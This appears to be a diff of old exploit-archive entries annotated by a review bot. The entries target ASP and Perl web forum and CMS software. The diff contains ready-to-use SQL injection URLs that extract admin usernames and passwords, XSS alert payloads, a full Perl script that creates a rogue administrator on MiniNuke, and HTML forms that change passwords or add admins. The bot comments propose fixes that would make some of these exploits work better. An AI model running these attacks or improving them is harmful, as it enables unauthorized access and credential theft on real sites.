http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r. http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
Ac.klama: Ac.klama:
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir. userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir.
userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir. userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir.
# milw0rm.com [2006-05-26] # milw0rm.com [2006-05-26]
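Review bot: the TURKISH half of this file has lost its non-ASCII letters to `.` (`SQL INJECT.ON`, `Ba.l.k`, `Aç.k`, `De.i.ken`, `uyar.s.`, `cal.st.r.labilmektedir`), and both sides of the hunk carry the same damage, so the whitespace rewrite did not repair the encoding; the file needs to be re-saved from a correct source as UTF-8. The Turkish dork line `Sözcük[Arama] : "powered by phpmydirectory"` also contradicts the English one (`"Copyright 2004 easy-content forums"`) and looks pasted from a different advisory; align it with the English dork.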

@ -1,7 +1,7 @@
# Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability # Title : PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Exploit Example: # Exploit Example:
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt
# milw0rm.com [2006-05-27] # milw0rm.com [2006-05-27]

@ -1,204 +1,204 @@
#!/usr/bin/perl #!/usr/bin/perl
#Method found & Exploit scripted by nukedx #Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31 #Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail> #Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket; use IO::Socket;
if(@ARGV != 5) { usage(); } if(@ARGV != 5) { usage(); }
else { exploit(); } else { exploit(); }
sub header() sub header()
{ {
print "\n- NukedX Security Advisory Nr.2006-31\r\n"; print "\n- NukedX Security Advisory Nr.2006-31\r\n";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n"; print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
} }
sub usage() sub usage()
{ {
header(); header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n"; print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n"; print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
print "- <user> -> Desired username to create ex: h4x0r\r\n"; print "- <user> -> Desired username to create ex: h4x0r\r\n";
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n"; print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n"; print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
exit(); exit();
} }
sub exploit () sub exploit ()
{ {
#Our variables... #Our variables...
$mnserver = $ARGV[0]; $mnserver = $ARGV[0];
$mnserver =~ s/(http:\/\/)//eg; $mnserver =~ s/(http:\/\/)//eg;
$mnhost = "http://".$mnserver; $mnhost = "http://".$mnserver;
$mndir = $ARGV[1]; $mndir = $ARGV[1];
$mnuser = $ARGV[2]; $mnuser = $ARGV[2];
$mnpass = $ARGV[3]; $mnpass = $ARGV[3];
$mnmail = $ARGV[4]; $mnmail = $ARGV[4];
$mnport = "80"; $mnport = "80";
#Sending data... #Sending data...
header(); header();
print "- Trying to connect: $mnserver\r\n"; print "- Trying to connect: $mnserver\r\n";
getsession(); getsession();
} }
sub getsession () sub getsession ()
{ {
print "- Getting session for register...\r\n"; print "- Getting session for register...\r\n";
$mnstar = "membership.asp?action=new"; $mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar; $mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mns "GET $mnsreq HTTP/1.1\n"; print $mns "GET $mnsreq HTTP/1.1\n";
print $mns "Accept: */*\n"; print $mns "Accept: */*\n";
print $mns "Referer: $mnhost\n"; print $mns "Referer: $mnhost\n";
print $mns "Accept-Language: tr\n"; print $mns "Accept-Language: tr\n";
print $mns "User-Agent: NukeZilla\n"; print $mns "User-Agent: NukeZilla\n";
print $mns "Cache-Control: no-cache\n"; print $mns "Cache-Control: no-cache\n";
print $mns "Host: $mnserver\n"; print $mns "Host: $mnserver\n";
print $mns "Connection: close\n\n"; print $mns "Connection: close\n\n";
print "- Connected...\r\n"; print "- Connected...\r\n";
while ($answer = <$mns>) { while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; } if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); } if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
} }
#if you are here... #if you are here...
die "- Exploit failed\r\n"; die "- Exploit failed\r\n";
} }
sub doregister () sub doregister ()
{ {
close($mns); close($mns);
$mntar = "membership.asp?action=register"; $mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar; $mnreq = $mnhost.$mndir.$mntar;
print "- Session getting done\r\n"; print "- Session getting done\r\n";
print "- Lets create our user...\r\n"; print "- Lets create our user...\r\n";
$mndata = "kuladi=".$mnuser; $mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass; $mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail; $mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r"; $mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo"; $mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs"; $mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1"; $mndata.= "&icq=1";
$mndata.= "&msn=1"; $mndata.= "&msn=1";
$mndata.= "&aim=1"; $mndata.= "&aim=1";
$mndata.= "&sehir=1"; $mndata.= "&sehir=1";
$mndata.= "&meslek=1"; $mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b"; $mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1"; $mndata.= "&yas_1=1";
$mndata.= "&yas_2=1"; $mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920"; $mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com"; $mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r"; $mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif"; $mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn; $mndata.= "&security_code=".$mngvn;
$mndata.= "&mail_goster=on"; $mndata.= "&mail_goster=on";
$mndatalen = length($mndata); $mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; $mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mn "POST $mnreq HTTP/1.1\r\n"; print $mn "POST $mnreq HTTP/1.1\r\n";
print $mn "Accept: */*\r\n"; print $mn "Accept: */*\r\n";
print $mn "Referer: $mnhost\r\n"; print $mn "Referer: $mnhost\r\n";
print $mn "Accept-Language: tr\r\n"; print $mn "Accept-Language: tr\r\n";
print $mn "Content-Type: application/x-www-form-urlencoded\r\n"; print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
print $mn "Accept-Encoding: gzip, deflate\r\n"; print $mn "Accept-Encoding: gzip, deflate\r\n";
print $mn "User-Agent: NukeZilla\r\n"; print $mn "User-Agent: NukeZilla\r\n";
print $mn "Cookie: $mncookie\r\n"; print $mn "Cookie: $mncookie\r\n";
print $mn "Host: $mnserver\r\n"; print $mn "Host: $mnserver\r\n";
print $mn "Content-length: $mndatalen\r\n"; print $mn "Content-length: $mndatalen\r\n";
print $mn "Connection: Keep-Alive\r\n"; print $mn "Connection: Keep-Alive\r\n";
print $mn "Cache-Control: no-cache\r\n\r\n"; print $mn "Cache-Control: no-cache\r\n\r\n";
print $mn $mndata; print $mn $mndata;
print $mn "\r\n\r\n"; print $mn "\r\n\r\n";
while ($answer = <$mn>) { while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) { if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...\r\n"; print "- Creating user has been done...\r\n";
print "- Loginning in to user...\r\n"; print "- Loginning in to user...\r\n";
dologin(); dologin();
} }
} }
#if you are here... #if you are here...
die "- Exploit failed\r\n"; die "- Exploit failed\r\n";
} }
sub dologin () sub dologin ()
{ {
close ($mn); close ($mn);
$mnltar = "enter.asp"; $mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar; $mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser; $mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass; $mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412"; $mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412"; $mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata); $mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; $mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnl "POST $mnlreq HTTP/1.1\r\n"; print $mnl "POST $mnlreq HTTP/1.1\r\n";
print $mnl "Accept: */*\r\n"; print $mnl "Accept: */*\r\n";
print $mnl "Referer: $mnhost\r\n"; print $mnl "Referer: $mnhost\r\n";
print $mnl "Accept-Language: tr\r\n"; print $mnl "Accept-Language: tr\r\n";
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n"; print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnl "Accept-Encoding: gzip, deflate\r\n"; print $mnl "Accept-Encoding: gzip, deflate\r\n";
print $mnl "User-Agent: NukeZilla\r\n"; print $mnl "User-Agent: NukeZilla\r\n";
print $mnl "Host: $mnserver\r\n"; print $mnl "Host: $mnserver\r\n";
print $mnl "Content-length: $mnldatalen\r\n"; print $mnl "Content-length: $mnldatalen\r\n";
print $mnl "Connection: Keep-Alive\r\n"; print $mnl "Connection: Keep-Alive\r\n";
print $mnl "Cache-Control: no-cache\r\n\r\n"; print $mnl "Cache-Control: no-cache\r\n\r\n";
print $mnl $mnldata; print $mnl $mnldata;
print $mnl "\r\n\r\n"; print $mnl "\r\n\r\n";
while ($answer = <$mnl>) { while ($answer = <$mnl>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; } if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); } if ($answer =~ /Cache-control:/) { doadmin(); }
} }
#if you are here... #if you are here...
die "- Exploit failed\r\n"; die "- Exploit failed\r\n";
} }
sub doadmin () sub doadmin ()
{ {
close($mnl); close($mnl);
print "- Editing profile..\r\n"; print "- Editing profile..\r\n";
$mnptar = "Your_Account.asp?op=UpdateProfile"; $mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar; $mnpreq = $mnhost.$mndir.$mnptar;
$mnpdata.= "email=".$mnmail; $mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r"; $mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo"; $mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs"; $mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1"; $mnpdata.= "&icq=1";
$mnpdata.= "&msn=1"; $mnpdata.= "&msn=1";
$mnpdata.= "&aim=1"; $mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1"; $mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1"; $mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b"; $mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1"; $mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1"; $mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1"; $mnpdata.= "&yas_3=1920',seviye='1";
$mnpdata.= "&web=http://www.milw0rm.com"; $mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r"; $mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif"; $mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on"; $mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata); $mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; $mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnp "POST $mnpreq HTTP/1.1\r\n"; print $mnp "POST $mnpreq HTTP/1.1\r\n";
print $mnp "Accept: */*\r\n"; print $mnp "Accept: */*\r\n";
print $mnp "Referer: $mnhost\r\n"; print $mnp "Referer: $mnhost\r\n";
print $mnp "Accept-Language: tr\r\n"; print $mnp "Accept-Language: tr\r\n";
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n"; print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnp "Accept-Encoding: gzip, deflate\r\n"; print $mnp "Accept-Encoding: gzip, deflate\r\n";
print $mnp "User-Agent: NukeZilla\r\n"; print $mnp "User-Agent: NukeZilla\r\n";
print $mnp "Cookie: $mnlcookie\r\n"; print $mnp "Cookie: $mnlcookie\r\n";
print $mnp "Host: $mnserver\r\n"; print $mnp "Host: $mnserver\r\n";
print $mnp "Content-length: $mnpdatalen\r\n"; print $mnp "Content-length: $mnpdatalen\r\n";
print $mnp "Connection: Keep-Alive\r\n"; print $mnp "Connection: Keep-Alive\r\n";
print $mnp "Cache-Control: no-cache\r\n\r\n"; print $mnp "Cache-Control: no-cache\r\n\r\n";
print $mnp $mnpdata; print $mnp $mnpdata;
print $mn "\r\n\r\n"; print $mn "\r\n\r\n";
while ($answer = <$mnp>) { while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) { if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...\r\n"; print "- Editing profile been done...\r\n";
print "- Exploiting finished succesfully\r\n"; print "- Exploiting finished succesfully\r\n";
print "- Your username $mnuser has been created as admin\r\n"; print "- Your username $mnuser has been created as admin\r\n";
print "- You can login with password $mnpass on $mnlreq\r\n"; print "- You can login with password $mnpass on $mnlreq\r\n";
exit(); exit();
} }
if ($answer =~ /Üyeler Açýktýr/) { if ($answer =~ /Üyeler Açýktýr/) {
print "- Exploit failed\r\n"; print "- Exploit failed\r\n";
exit(); exit();
} }
} }
#if you are here... #if you are here...
die "- Exploit failed\r\n"; die "- Exploit failed\r\n";
} }
# nukedx.com [2006-05-27] # nukedx.com [2006-05-27]
# milw0rm.com [2006-05-27] # milw0rm.com [2006-05-27]
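Review bot: in doadmin(), the trailing `print $mn "\r\n\r\n";` after the profile POST body writes to `$mn`, the socket closed at the top of dologin(), while every surrounding line in that sub uses `$mnp`; the script runs without `use strict` or `use warnings`, which would have flagged the stale handle. The getsession() request is also sent with bare `\n` header terminators while the three other requests use `\r\n`, and `$mnserver =~ s/(http:\/\/)//eg;` carries an `/e` flag that has no purpose on an empty replacement.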

@ -1,25 +1,25 @@
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Enigma Haber <= 4.3 This exploits works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34 Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586 http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1 http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00 http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00 http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights. Examples in the below needs admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664 http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
# nukedx.com [2006-05-27] # nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28] # milw0rm.com [2006-05-28]

@ -1,15 +1,15 @@
ASPSitem <= 2.0 Multiple Vulnerabilities. ASPSitem <= 2.0 Multiple Vulnerabilities.
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on ASPSitem <= 2.0. This exploits works on ASPSitem <= 2.0.
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39 Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
SQL injection -> SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL] GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20 EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201 id%20like%201
with this example remote attacker can leak userid 1's login information from database. with this example remote attacker can leak userid 1's login information from database.
Read others private messages -> Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
# nukedx.com [2006-05-27] # nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28] # milw0rm.com [2006-05-28]
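Review bot: the `EXAMPLE ->` URL for Anket.asp is wrapped onto a second line (`...from%20uyeler%20where%20` followed by `id%20like%201`), which splits the query string mid-parameter; keep it on one line as the other PoC files in this commit do. `This exploits works on` should read `This exploit works on`.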

@ -1,69 +1,69 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<div bgcolor="#000000"> <div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);"> <form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change // <b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
Name Name
: </b></font> : </b></font>
<input type="text" name="name" value="" size="20"> <input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname <font size="1" color="#C0C0C0" face="Arial"> Example: Surname
Name</font><br> Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User <font face="Verdana" size="2" color="#FF0000"><b>User
Mail Mail
: </b></font> : </b></font>
<input type="text" name="email" value="" size="20"> <input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: <font size="1" color="#C0C0C0" face="Arial"> Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br> <a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User <font face="Verdana" size="2" color="#FF0000"><b>User
Ýd Ýd
: </b></font> : </b></font>
<input type="text" name="id" value="" size="20"> <input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1 <font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
Admin</font><br> Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country : <font face="Verdana" size="2" color="#FF0000"><b>User Country :
</b> </b>
</font> </font>
<select size="1" name="country"> <select size="1" name="country">
<option value="0">Choose Country</option> <option value="0">Choose Country</option>
<option value="Turkey">Turkey</option> <option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example: </select> <font size="1" color="#C0C0C0" face="Arial"> Example:
Turkey</font><br> Turkey</font><br>
<b> <b>
<font face="Verdana" size="2" color="#FF0000">User </font> <font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font> <font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000"> <font face="Verdana" size="2" color="#FF0000">
: </font></b> : </font></b>
<input type="text" name="password" value="Password" size="20"> <input type="text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br> <font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b> <b>
<font face="Verdana" size="2" color="#FF0000">User </font> <font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000"> <font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
: </font></b> : </font></b>
<input type="text" name="passwordre" value="Re Password" size="20"> <input type="text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br> <font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>Form Action : <font face="Verdana" size="2" color="#FF0000"><b>Form Action :
</b> </b>
</font> </font>
<input type="text" name="adres" value="profileupdate.asp" size="20"> <input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: <font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileu<WBR>pdate.asp</font></p> http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
<p> <p>
<input type="submit" name="Submit" value="Change"> </p> <input type="submit" name="Submit" value="Change"> </p>
<br> <br>
</form> </form>
</div></body></html> </div></body></html>
# milw0rm.com [2006-05-29] # milw0rm.com [2006-05-29]
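Review bot: the `<form name="InputForm" method="post" target="_blank" ...>` tag has no `action` attribute and nothing in the file reads the `adres` text field (`profileupdate.asp`), so submitting the form posts back to whatever page hosts it, and the `onsubmit` confirm text about "an external page" refers to a destination that is never set. `bgcolor` is not a valid attribute on `div`, and the `Ýd` labels are single-byte Turkish text in a file declared `charset=utf-8`, so they render as mojibake.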

@ -1,43 +1,43 @@
################ KAPDA - Security Science Researchers Institute ################# ################ KAPDA - Security Science Researchers Institute #################
#Advisory : http://www.kapda.ir/advisory-337.html #Advisory : http://www.kapda.ir/advisory-337.html
#Vendor : http://www.nukedit.com/ #Vendor : http://www.nukedit.com/
#What is : Nukedit is a Free Content Management #What is : Nukedit is a Free Content Management
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable! #Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir #Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
#Vulnerabale versions : <= 4.9.6 #Vulnerabale versions : <= 4.9.6
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com #Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
#Solution : update to new version of nukedit . #Solution : update to new version of nukedit .
#Change "http://victim.com/nukedit/utilities/register.asp" #Change "http://victim.com/nukedit/utilities/register.asp"
################ KAPDA - Security Science Researchers Institute ################# ################ KAPDA - Security Science Researchers Institute #################
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title> <html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body> <body>
<font face="Verdana" Size="1"><br> <font face="Verdana" Size="1"><br>
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br> Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br> Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br> Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
Fill the blank and submit . After that login with your email ! + your password .<p> Fill the blank and submit . After that login with your email ! + your password .<p>
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp"> <form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
<input type="hidden" name="action" value="addDB"></p> <input type="hidden" name="action" value="addDB"></p>
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt"> <br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
